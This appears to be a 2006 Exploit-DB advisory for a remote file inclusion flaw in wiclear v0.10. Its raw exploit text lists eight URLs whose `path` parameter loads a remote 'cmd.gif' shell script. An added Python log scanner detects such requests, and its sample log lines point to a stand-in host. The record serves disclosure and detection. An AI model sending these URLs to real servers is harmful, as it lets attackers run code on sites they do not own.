Vendor: wiclear
By: the master (nidhal)
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: wiclear
Affected Version From: v0.10
Affected Version To: v0.10
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

wiclear v0.10 Remote File Inclusion Vulnerability

wiclear v0.10 is vulnerable to remote file inclusion. An attacker can exploit the vulnerability by sending a crafted URL to the vulnerable application. The URL's `path` parameter points to a malicious file hosted on a remote server. When the vulnerable application receives the URL, it executes the malicious file.

Mitigation:

The application should filter user input and should not allow users to pass malicious URLs.

Exploit-DB raw data:

########################################################################
#  wiclear v0.10  Remote File Inclusion Vulnerability
#
#  Download: http://wiclear.free.fr/download/wiclear-0.10.tgz
#
#  Found By: the master (nidhal)
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/admin/inc/prepend.inc.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/inc/lib/boxes.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/inc/lib/tools.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/tools/trackback/index.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/tools/utf8conversion/index.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/prepend.inc.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/lib/boxes.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/lib/history.lib.php?path=http://cmd.gif?
#
#
# Greetz: str0ke , Dr Max Virus , The Small Hacker , crack_man
########################################################################

# milw0rm.com [2006-10-23]
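
A detection check for the request pattern in the advisory above, added here as an example (it is not part of the original advisory or of wiclear). It scans web server access log lines for requests to the listed scripts whose `path` parameter holds a URL instead of a local path. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths listed in the advisory, relative to the wiclear install directory.
AFFECTED_SCRIPTS = (
    "/admin/inc/prepend.inc.php",
    "/admin/inc/lib/boxes.lib.php",
    "/admin/inc/lib/tools.lib.php",
    "/admin/tools/trackback/index.php",
    "/admin/tools/utf8conversion/index.php",
    "/inc/prepend.inc.php",
    "/inc/lib/boxes.lib.php",
    "/inc/lib/history.lib.php",
)

# A value that begins with a URL scheme (http:, ftp:, php:, data:, ...) is not a local path.
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def remote_path_param(target):
    """Return the `path` value if it is a URL sent to an affected script, else None."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(AFFECTED_SCRIPTS):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl percent-decodes once, so encoded schemes are seen in clear.
        if name == "path" and REMOTE_VALUE.match(value):
            return value
    return None

def scan(lines):
    """Yield (line_number, path_value) for each log line that matches."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = remote_path_param(match.group(1)) if match else None
        if value is not None:
            yield number, value

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '192.0.2.10 - - [23/Oct/2006:10:00:01 +0000] "GET /blog/index.php?page=Home HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.77 - - [23/Oct/2006:10:00:05 +0000] "GET /blog/inc/prepend.inc.php?path=http://files.example.invalid/cmd.gif? HTTP/1.1" 200 312 "-" "-"',
    '192.0.2.77 - - [23/Oct/2006:10:00:09 +0000] "GET /blog/admin/inc/lib/tools.lib.php?path=hTTp%3A%2F%2Ffiles.example.invalid%2Fcmd.gif HTTP/1.0" 200 298 "-" "-"',
    '192.0.2.10 - - [23/Oct/2006:10:00:12 +0000] "GET /blog/inc/lib/boxes.lib.php?path=../ HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote path value {value!r}")
```

Query strings only appear in the access log for the request line, so a `path` value sent in a POST body is not visible to this check.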